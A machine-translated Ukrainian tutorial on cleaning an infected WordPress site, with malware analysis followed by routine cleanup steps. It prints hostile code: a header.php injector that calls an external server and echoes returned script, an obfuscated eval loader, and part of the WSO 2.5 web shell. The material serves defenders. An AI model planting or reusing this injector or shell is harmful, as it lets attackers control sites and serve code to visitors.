Видаліть вірус PHP WordPress

Цей підручник представляє певний випадок, в якому блог WordPress був вірусом. Видаліть вірус PHP WordPress.

зміст

Останні дні я помітив підозрілий код, який, здається, є вірусом PHP для WordPress. Наступний код PHP був присутній header.php, перед лінією </head>.

<?php $wp_rssh = 'http'; $wp_gt = 'web'; error_reporting(0); ini_set('display_errors',0); $wp_uagent = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Firefox|MSIE/i', $wp_uagent) && preg_match ('/ NT/i', $wp_uagent))){
$wp_gturl=$wp_rssh."://".$wp_gt.$wp_rssh."s.com/".$wp_gt."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_uagent);
$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_gturl);
curl_setopt ($ch, CURLOPT_TIMEOUT, 10); $wp_cntnt = curl_exec ($ch); curl_close($ch);}
if ( substr($wp_cntnt,1,3) === 'scr' ){ echo $wp_cntnt; } ?>

Це код PHP, який, як показано, намагається відновити вміст ресурсу на зовнішньому сервері, але частина, яка стосується URL -адреси, є неповною.

Механізм експлуатації трохи складніший і робить цей WordPress PHP невидимий вірус для відвідувачів уражених ділянок. Натомість він націлений на пошукові системи (Google) і неявно призводить до значного зменшення кількості відвідувачів на постраждалих веб -сайтах.

Зловмисне програмне забезпечення WordPress PHP Деталі зловмисне програмне забезпечення

1. Наведений вище код присутній header.php.

2. На сервері з’явився файл wp-log.php У папці wp-includes.

3. wp-log.php Містить зашифрований код, але його порівняно легко розшифрувати.

<?php eval(gzinflate(base64_decode('7b1rd../Fw=='))) ?>

Визначення коду зловмисного програмного забезпечення з wp-log.php :

<?php
$auth_pass = "md5password";
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';
#+Dump Columns ////Boolean
if(!empty($_SERVER['HTTP_USER_AGENT'])) {
    $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler" );
    if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
        header('HTTP/1.0 404 Not Found');
        exit;
    }
}

@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
@define('WSO_VERSION', '2.5');

if(get_magic_quotes_gpc()) {
    function WSOstripslashes($array) {
        return is_array($array) ? array_map('WSOstripslashes', $array) : stripslashes($array);
    }
    $_POST = WSOstripslashes($_POST);
    $_COOKIE = WSOstripslashes($_COOKIE);
}

function wsoLogin() {
    die("
<pre align=center-->

<form method="post"><input name="pass" type="password" /><input type="submit" value="" /></form>" );
}

function WSOsetcookie($k, $v) {
$_COOKIE[$k] = $v;
setcookie($k, $v);
}

if(!empty($auth_pass)) {
if(isset($_POST['pass']) &amp;&amp; (md5($_POST['pass']) == $auth_pass))
WSOsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass);

if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass))
wsoLogin();
}

if(strtolower(substr(PHP_OS,0,3)) == "win" )
$os = 'win';
else
$os = 'nix';

$safe_mode = @ini_get('safe_mode');
if(!$safe_mode)
error_reporting(0);

$disable_functions = @ini_get('disable_functions');
$home_cwd = @getcwd();
if(isset($_POST['c']))
@chdir($_POST['c']);
$cwd = @getcwd();
if($os == 'win') {
$home_cwd = str_replace("\\", "/", $home_cwd);
$cwd = str_replace("\\", "/", $cwd);
}
if($cwd[strlen($cwd)-1] != '/')
$cwd .= '/';
?>

Здається, це сценарій зловмисного програмного забезпечення PHP, який містить код для управління автентифікацією та діями у файлах та каталогах на сервері. Дуже легко видно, що цей сценарій містить такі змінні $auth_pass (пароль аутентифікації), $default_action (За замовчуванням Дія), $default_use_ajax (використання за замовчуванням AJAX) та $default_charset (Налаштування символів за замовчуванням).

Очевидно, що цей сценарій має розділ, який перевіряє агентів користувачів HTTP для блокування доступу до певних веб -роботів, таких як пошукові системи. Він також має розділ, який перевіряє режим безпеки PHP та встановлює певних робочих директорів.

4. Якщо в браузері доступ до WP-log.php, веб-сторінка з'являється з полем аутентифікація. На перший погляд, здається, це менеджер файлів, за допомогою якого нові файли можна легко піднятися на цільовий сервер.

Cum devirusezi un веб -сайт wordpress?

Завжди, процес ручного розладу передбачає відкриття та розуміння спочатку, що було вразливістю.

1. Створює резервну копію для всього веб -сайту. Він повинен включати як файли, так і базу даних.

2. Визначте приблизно, як довго з’явився вірус, і шукає на веб -сервері модифіковані або нові файли, створені в приблизний час.

Наприклад, якщо ви хочете побачити файли .php Створений або модифікований за останній тиждень виконайте команду на сервері:

find /your/web/path -type f -mtime -7 -exec ls -l {} \; | grep "\.php$"

Це простий метод, за допомогою якого ви можете знизити файли WordPress та ті, що містять зловмисне програмне забезпечення.

3. Перевірте файл .htaccess підозрілих директив. Лінії дозволу або виконання сценарію.

4. Перевірте базу даних. Цілком можливо, що деякі повідомлення та сторінки WordPress були відредаговані за допомогою зловмисного програмного забезпечення або додавання нових Користувачі з роллю адміністратора.

5. Перевірте дозволи на написання папок та файлів. chmod і chown.

Рекомендовані дозволи: 644 для файлів та 755 для директорів.

find /web/root/public/ -type f -exec chmod 644 {} \;
find /web/root/public/ -type d -exec chmod 755 {} \;

6. Оновіть усі WordPress Plugins / WordPress Themes.

Пов'язаний: Виправити перенаправлення WordPress Hack 2023 (перенаправлення вірусу)

Це методи “основний” через який ви можете звільнити блог веб -сайту / WordPress. Якщо у вас є проблеми і вам потрібна допомога, поле для коментарів відкрите.